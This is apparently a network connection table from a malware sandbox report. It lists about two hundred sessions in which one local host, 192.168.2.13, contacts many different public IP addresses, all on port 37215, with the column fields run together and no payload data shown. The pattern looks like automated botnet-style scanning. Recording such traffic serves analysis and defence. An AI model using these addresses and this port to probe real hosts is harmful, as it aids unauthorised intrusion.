                                                  9293192.168.2.135393441.74.116.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9294192.168.2.1356088197.250.100.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9295192.168.2.1333772197.56.187.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9296192.168.2.1332842197.189.233.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9297192.168.2.1340276197.108.53.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9298192.168.2.1336960157.228.90.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9299192.168.2.134343241.50.51.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9300192.168.2.1333848157.145.120.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9301192.168.2.1340410157.3.98.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9302192.168.2.1353720197.97.11.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9303192.168.2.1354464157.180.165.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9304192.168.2.135514241.44.83.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9305192.168.2.1334058220.183.16.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9306192.168.2.1342602197.213.91.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9307192.168.2.134746841.135.239.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9308192.168.2.134230441.186.223.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9309192.168.2.136059435.5.225.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9310192.168.2.1352162175.11.164.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9311192.168.2.1342164197.160.34.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9312192.168.2.1353540197.172.133.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9313192.168.2.1337236157.2.54.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9314192.168.2.1350416106.44.114.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9315192.168.2.1334082197.48.150.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9316192.168.2.1347174105.116.185.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9317192.168.2.1348126157.22.41.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9318192.168.2.134823641.173.138.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9319192.168.2.1356348197.89.236.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9320192.168.2.1354802197.85.182.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9321192.168.2.1343958157.166.55.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9322192.168.2.1350670157.227.133.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9323192.168.2.135355241.69.129.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9324192.168.2.1353632197.122.191.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9325192.168.2.134336641.116.152.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9326192.168.2.1345078157.39.238.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9327192.168.2.1358504197.236.237.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9328192.168.2.134004241.52.155.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9329192.168.2.1354960182.243.150.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9330192.168.2.1337266115.181.83.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9331192.168.2.1334700197.58.42.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9332192.168.2.135159841.179.109.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9333192.168.2.1356544177.110.244.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9334192.168.2.134909841.207.37.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9335192.168.2.1346624197.67.249.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9336192.168.2.135564241.2.33.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9337192.168.2.1349662157.70.96.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9338192.168.2.134147041.6.105.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9339192.168.2.134511025.17.206.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9340192.168.2.1340400197.232.65.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9341192.168.2.1347830181.53.164.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9342192.168.2.133817841.48.252.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9343192.168.2.135644641.116.70.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9344192.168.2.134613441.237.124.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9345192.168.2.1346794177.65.17.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9346192.168.2.1354748197.189.202.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9347192.168.2.1333390197.175.71.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9348192.168.2.1340954157.13.19.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9349192.168.2.1333136157.197.81.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9350192.168.2.135110441.126.221.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9351192.168.2.1358862197.185.191.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9352192.168.2.134971641.210.178.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9353192.168.2.1352212197.50.112.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9354192.168.2.1358016157.90.123.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9355192.168.2.133832841.35.30.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9356192.168.2.1337350197.202.94.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9357192.168.2.135050041.165.70.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9358192.168.2.1340022157.70.244.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9359192.168.2.1351784157.231.46.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9360192.168.2.1358686143.251.23.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9361192.168.2.1348162157.198.191.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9362192.168.2.1336936152.29.146.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9363192.168.2.1360136157.164.188.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9364192.168.2.135579041.177.165.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9365192.168.2.1355714197.50.243.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9366192.168.2.1356506197.94.19.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9367192.168.2.1344176210.160.184.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9368192.168.2.135515641.187.198.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9369192.168.2.133457882.163.137.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9370192.168.2.1338794160.118.207.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9371192.168.2.135349041.112.237.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9372192.168.2.134329241.188.4.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9373192.168.2.1336198157.2.223.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9374192.168.2.133328041.155.195.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9375192.168.2.134898241.45.57.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9376192.168.2.134031241.209.140.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9377192.168.2.134967841.240.141.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9378192.168.2.134070482.235.22.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9379192.168.2.134287672.171.252.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9380192.168.2.1335090111.175.34.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9381192.168.2.1346204157.154.230.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9382192.168.2.1348946197.95.149.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9383192.168.2.1333984157.109.4.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9384192.168.2.1348290157.53.141.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9385192.168.2.135845884.161.104.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9386192.168.2.134441841.75.237.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9387192.168.2.1342978197.96.72.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9388192.168.2.133675441.165.45.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9389192.168.2.134195241.208.173.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9390192.168.2.1343858157.40.68.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9391192.168.2.1359216197.108.69.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9392192.168.2.1345628197.221.48.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9393192.168.2.1338780105.1.59.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9394192.168.2.134608641.144.8.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9395192.168.2.135727641.230.155.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9396192.168.2.134820283.22.69.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9397192.168.2.1353480157.245.184.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9398192.168.2.135687493.177.190.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9399192.168.2.1346134108.106.86.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9400192.168.2.1335380157.143.245.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9401192.168.2.134223472.6.115.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9402192.168.2.1345206197.155.40.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9403192.168.2.1349028197.127.178.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9404192.168.2.1338494197.178.196.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9405192.168.2.1339096157.207.29.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9406192.168.2.1343338157.189.86.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9407192.168.2.1354764157.54.110.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9408192.168.2.1358504157.23.74.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9409192.168.2.1348564197.84.80.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9410192.168.2.1357522197.67.174.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9411192.168.2.133362870.37.199.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9412192.168.2.1345168197.187.52.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9413192.168.2.1353100112.230.192.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9414192.168.2.1342288157.10.181.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9415192.168.2.1359238157.231.247.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9416192.168.2.135821857.49.252.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9417192.168.2.1349870157.192.137.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9418192.168.2.1358302157.251.79.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9419192.168.2.13599742.247.1.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9420192.168.2.135811841.148.110.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9421192.168.2.1341176197.253.91.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9422192.168.2.136054641.212.95.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9423192.168.2.134048241.62.120.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9424192.168.2.133676079.5.145.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9425192.168.2.135356441.154.190.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9426192.168.2.1352694165.27.70.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9427192.168.2.1346152197.184.164.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9428192.168.2.1351576157.121.22.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9429192.168.2.1355894157.240.156.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9430192.168.2.1341782157.2.178.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9431192.168.2.1342378169.254.228.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9432192.168.2.1342742197.9.30.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9433192.168.2.1335584197.25.56.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9434192.168.2.1335058157.63.175.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9435192.168.2.1357480140.237.35.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9436192.168.2.1341824197.177.143.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9437192.168.2.1345140157.18.42.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9438192.168.2.1338210194.72.197.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9439192.168.2.133618841.93.154.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9440192.168.2.1340286212.112.23.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9441192.168.2.1333158197.150.211.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9442192.168.2.1356942157.188.185.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9443192.168.2.135922897.243.187.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9444192.168.2.1344774104.51.163.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9445192.168.2.135680641.50.99.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9446192.168.2.135264041.65.34.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9447192.168.2.1359374197.185.20.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9448192.168.2.1333134197.187.215.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9449192.168.2.134892241.91.222.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9450192.168.2.1354530138.128.45.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9451192.168.2.1359944157.190.103.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9452192.168.2.135834641.40.90.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9453192.168.2.1357516157.109.49.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9454192.168.2.1354532197.198.167.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9455192.168.2.1360904157.78.26.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9456192.168.2.1337286157.47.216.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9457192.168.2.1342130157.33.138.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9458192.168.2.133765867.95.98.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9459192.168.2.1333928157.186.104.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9460192.168.2.1348250197.18.47.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9461192.168.2.135234041.113.41.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9462192.168.2.135131241.242.93.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9463192.168.2.1341284197.8.124.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9464192.168.2.1340778157.146.202.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9465192.168.2.1346896157.63.187.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9466192.168.2.134765292.52.90.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9467192.168.2.1334346197.89.116.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9468192.168.2.133479241.172.221.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9469192.168.2.1335528157.170.93.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9470192.168.2.1353858157.111.182.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9471192.168.2.1343128197.77.199.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9472192.168.2.135481641.190.189.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9473192.168.2.1350772197.148.57.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9474192.168.2.134901641.9.135.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9475192.168.2.135714441.99.241.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9476192.168.2.1360316157.101.34.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9477192.168.2.135013241.113.148.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9478192.168.2.1346592197.80.181.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9479192.168.2.1360984157.237.67.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9480192.168.2.1359006157.186.135.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9481192.168.2.1359624163.100.42.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9482192.168.2.1345656157.183.240.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9483192.168.2.1354758197.49.157.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9484192.168.2.135055241.84.242.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9485192.168.2.1338714157.86.15.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9486192.168.2.1345018197.244.103.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9487192.168.2.1355746157.167.209.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9488192.168.2.1357234135.232.94.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9489192.168.2.1345214157.137.106.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9490192.168.2.1345836169.21.139.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9491192.168.2.1335964157.26.14.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9492192.168.2.1343976157.173.0.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9493192.168.2.1346974157.206.67.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9494192.168.2.1342396197.189.0.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9495192.168.2.1359768157.121.205.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9496192.168.2.135403441.113.43.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9497192.168.2.1359198197.198.104.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9498192.168.2.133357619.182.215.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9499192.168.2.1344374197.122.202.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9500192.168.2.135674212.234.207.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9501192.168.2.136024441.152.162.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9502192.168.2.1340408197.142.165.13837215
